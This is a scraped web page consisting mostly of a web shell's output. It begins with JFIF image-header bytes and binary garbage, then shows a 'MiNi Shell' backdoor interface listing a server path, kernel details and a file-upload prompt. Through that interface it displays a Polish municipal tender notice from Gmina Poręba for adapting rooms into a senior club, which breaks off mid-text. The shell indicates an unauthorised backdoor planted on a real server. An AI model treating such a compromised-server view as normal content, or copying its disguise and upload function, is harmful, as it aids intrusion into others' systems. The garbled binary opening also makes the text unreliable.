JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220714/0025606601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> SENIOR &#34;+&#34; Adaptacja pomieszczeń w budynku MOK w Porębie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Poręba</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258894</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poręba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(32) 677 13 55</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sod@umporeba.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umporeba.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> SENIOR &#34;+&#34; Adaptacja pomieszczeń w budynku MOK w Porębie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f17932d6-0367-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00256066</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00338254/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Senior &#34;+&#34; Adaptacja pomieszczeń w budynku MOK w Porębie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.umporeba.pl/ , https://bip.umporeba.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne związane z<br/>korzystaniem z miniPortalu:<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane<br/>zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi<br/>W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z<br/>dostępem do sieci Internet. Aplikacja działa na Platformie Windows, Mac i Linux. Specyfikacja połączenia, formatu przesyłanych<br/>danych oraz kodowania i oznaczania czasu odbioru danych:<br/>- specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>- oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z<br/>dokładnością co do setnej części sekundy,<br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy<br/>wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia<br/>Odbioru czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji<br/>„Dane poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>- Microsoft Internet Explorer od wersji 11.0<br/>- Mozilla Firefox od wersji 15<br/>- Google Chrome od wersji 20<br/>- Microsoft Edge<br/>Pozostałe wymagania techniczne i organizacyjne wskazane zostały w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest: Burmistrz Miasta Poręba – Miasto Poręba, ul. Dworcowa 1, 42-480 Poręba, tel:<br/>32 677 13 55, e-mail: sekretariat@umporeba.pl;<br/>- Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach związanych z<br/>ochroną<br/>danych osobowych w następujący sposób:<br/>• pod adresem poczty elektronicznej: ido@umporeba.pl;<br/>• pisemnie na adres siedziby Administratora;<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego: Przebudowa boiska na wielofunkcyjne przy Szkole Podstawowej nr 2<br/>wraz z siłownią zewnętrzną;<br/>-odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2019r. poz. 2019 z<br/>późn.zm.), dalej „ustawa Pzp”;<br/>- Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie<br/>rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w<br/>sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>- posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (2);<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>- nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z<br/>ustawą.<br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia<br/>2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania o udzielenie zamówienia<br/>publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.06.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Adaptacja pomieszczenia na Klub Seniora w MOK w Porębie SENIOR +<br/>Przedmiotem zamówienia jest:<br/>- przygotowanie powierzchni pod malowanie<br/>- malowanie tynków wewn. farbę zmywalną np. typu BOLIX<br/>- rozebranie wykładziny z podłogi<br/>- demontaż drzwi dwuskrzydłowych z ościeżnicą drewnianą,<br/>- wykonanie i montaż ościeżnicy drewnianej szer. 0,50 m<br/>- wykonanie i montaż skrzydeł drzwiowych drewnianych dwuskrzydłowych<br/>- położenie paneli podłogowych<br/>- wymiana oświetlenia<br/>- montaż gniazd wtykowych<br/>- wykonanie zabezpieczenia przed porażeniem<br/>- montaż zlewozmywaka z ociekaczem na szafce,<br/>- montaż mini zmywarki do zabudowy<br/>3<br/>- doprowadzenie wody do zlewozmywaka z ociekaczem i do mini zmywarki<br/>- wykonanie odpływu do kanalizacji ze zlewozmywaka i zmywarki<br/>1.2. Adaptacja sali gimnastycznej na potrzeby Klubu Seniora w MOK<br/>Przedmiotem zamówienia jest:<br/>- skucie zmurszałych tynków na ścianach<br/>- odgrzybienie w miejscu skutych tynków<br/>- odtworzenie tynków na ścianach<br/>- przygotowanie powierzchni pod malowanie<br/>- malowanie tynków wewn. farbę zmywalną<br/>- demontaż drzwi z ościeznica drewnianą,<br/>- zakup i montaż ościeznicy drewnianej<br/>- zakup i montaż skrzydeł drzwiowych<br/>- cyklinowanie i malowanie parkietu<br/>- zakup i montaż platformy dla niepełnosprawnych.<br/>1.3. Adaptacja szatni dla Klubu Seniora w MOK<br/>Przedmiotem zamówienia jest:<br/>- wykucie ościeży drewnianych<br/>- wymurowanie filara z cegieł<br/>- obsadzenie drzwi wejściowych wewn. z ościeznicą z PCW<br/>- przygotowanie istn. podłoża - gruntowanie emulsją typu ATLAS UNI-GRUNT<br/>- przygotowanie powierzchni pod malowanie<br/>- wykonanie gładzi gipsowych na ścianach,<br/>- malowanie tynków wewn.<br/>- rozbiórka podłogi z desek na legarach<br/>- ułożenie paneli podłogowych AC5 z listwami przyściennym-<br/>- wykonanie stropu podwieszonego typu Armstrong z oświetleniem w kasetonach 30x30 cm<br/>1.4. Przebudowa sanitariatu na sanitariat NPS wraz z budową pochylni dla osób<br/>niepełnosprawnych dla zadania pn. Utworzenie Klubu Senior &#34;+&#34;<br/>Przedmiotem zamówienia jest:<br/>- wykucie z muru istn. ościeżnic<br/>-rozebranie ścianek działowych z cegły<br/>- rozebranie wykładziny ściennej z płytek ceramicznych<br/>- zerwanie istn. Posadzki lastrykowej<br/>- demontaż istn. Instalacji wod.-kan.<br/>- demontaż baterii umywalkowych oraz umywalek<br/>- demontaż ustępów z miska fajansowa<br/>- wywiezienie mat. z rozbiórki wraz z utylizacja<br/>- montaż rurociągów wod.-kan.<br/>- montaż umywalki wraz z bateriami dla niepełnosprawnych<br/>- montaż umywalki wraz z bateriami<br/>- montaż miski ustępowej typu Geberit<br/>- montaż miski ustępowej typu Geberit dla niepełnosprawnych<br/>- montaż kompletu uchwytów dla niepełnosprawnych<br/>- wykonanie przesklepienia otworu w ścianie<br/>- wykonanie ścianki działowej z bloczków YTONG gr. 15 cm oraz z płyt gipsowokartonowych<br/>wodoodpornych na rusztach metalowych<br/>- wykonanie izolacji pionowej i poziomej z folii w płynie typu np. Folbit<br/>4<br/>- wykonanie okładzin podłogowych i ściennych z płytek z kamieni sztucznych 30x30 cm<br/>- wykonanie gładzi gipsowych na ścianach oraz malowanie<br/>- montaż sufitów podwieszonych o kontr. metalowej z wypełnieniem płytami z włókien<br/>mineralnych 30x30 cm (np. typu Armstrong)<br/>- obsadzenie ościeżnic stalowych oraz skrzydeł drzwiowych z otworami<br/>wentylacyjnymi<br/>o pow. 0,022 m2<br/>- demontaż i montaż nowej instalacji elektrycznej<br/>- oświetlenie umieszczone w suficie podwieszonym w kasetonach 30x30 c-<br/>- dostarczenie i montaż podjazdu dla niepełnosprawnych<br/>Wykonanie wszystkich robót zgodnie ze SWZ wraz z załącznikami.<br/>2. Szczegółowy opis i zakres przedmiotu zamówienia został zawarty w przedmiarze<br/>robót w załączniku nr 6 do SWZ, a zakres robót określa: dokumentacja projektowa<br/>stanowiąca załącznik nr 8 do SWZ, specyfikacja techniczna wykonania i odbioru robót<br/>załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena ofertowa – 60 pkt; okres udzielonej gwarancji – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.3.Sytuacja ekonomiczna lub finansowa:<br/>3.3.1. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie<br/>mniejszą niż 150 000,00 zł.<br/>19<br/>3.3.2. Wykonawca musi wykazać, iż posiada środki finansowe lub zdolność<br/>kredytową, w wysokości nie mniejszej niż 150 000,00 zł.<br/>3.4.Zdolność techniczna lub zawodowa:<br/>Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału<br/>w postępowaniu:<br/>3.4.1. Wykonawca musi wykazać, iż w okresie ostatnich pięciu lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie – wykonał należycie, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył<br/>co najmniej:<br/>2 roboty budowlane polegające na wykonaniu prac budowlanych w zakresie budowy,<br/>przebudowy, remontu lub adaptacji w zakresie ogólnobudowlanym wraz<br/>z wykonaniem instalacji wod.-kan., elektrycznych o wartości nie mniejszej niż<br/>150 000 zł brutto oraz załączą dowody, że te roboty zostały wykonane w sposób<br/>należyty wskazując, czy zostały wykonane zgodnie z zasadami sztuki budowlanej<br/>i prawidłowo ukończone.<br/>3.4.2. Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował)<br/>osobą/ami zdolną/ymi do wykonania zamówienia, tj.:<br/>- co najmniej po 1 osobie posiadającą/ymi prawo do wykonywania samodzielnych<br/>funkcji kierownika budowy i robót w specjalności konstrukcyjno-budowlanej,<br/>instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych,<br/>wodociągowych i kanalizacyjnych oraz elektrycznych<br/>lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów<br/>oraz zrzeszoną/ymi we właściwym samorządzie zawodowym, zgodnie z przepisami<br/>ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów<br/>budowlanych oraz urbanistów (tekst jedn. Dz. U. z 2019 r. poz. 1117)<br/>lub<br/>spełniającą/ymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r.<br/>Prawo budowlane (tekst jednolity Dz. U. z 2021 r. poz. 2351 z późn. zm.), tj.<br/>osobą/y, której/ych odpowiednie kwalifikacje zawodowe zostały uznane na zasadach<br/>określonych w przepisach odrębnych lub spełniającą/ymi wymogi, o których mowa<br/>w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów,<br/>inżynierów budowlanych oraz urbanistów („świadczenie usług transgranicznych”).<br/>Zamawiający dopuszcza łączenie kilku funkcji przez jedną osobę w przypadku<br/>posiadania przez nią kilku rodzajów wymaganych uprawnień budowlanych oraz<br/>kwalifikacji i doświadczenia.<br/>Uwaga nr 2:<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji roboty budowlano<br/>wykonawczej wspólnie z innymi wykonawcami, należy wykazać robotę budowlaną,<br/>w której Wykonawca bezpośrednio uczestniczył.<br/>Uwaga nr 3:<br/>W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunków<br/>udziału, waluty innej niż polska (PLN), w celu jej przeliczenia stosowany będzie średni<br/>kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych na portalu internetowym Urzędu Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4.1.Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania<br/>braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274<br/>ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków<br/>dowodowych (aktualnych na dzień ich złożenia):<br/>- oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275),<br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi 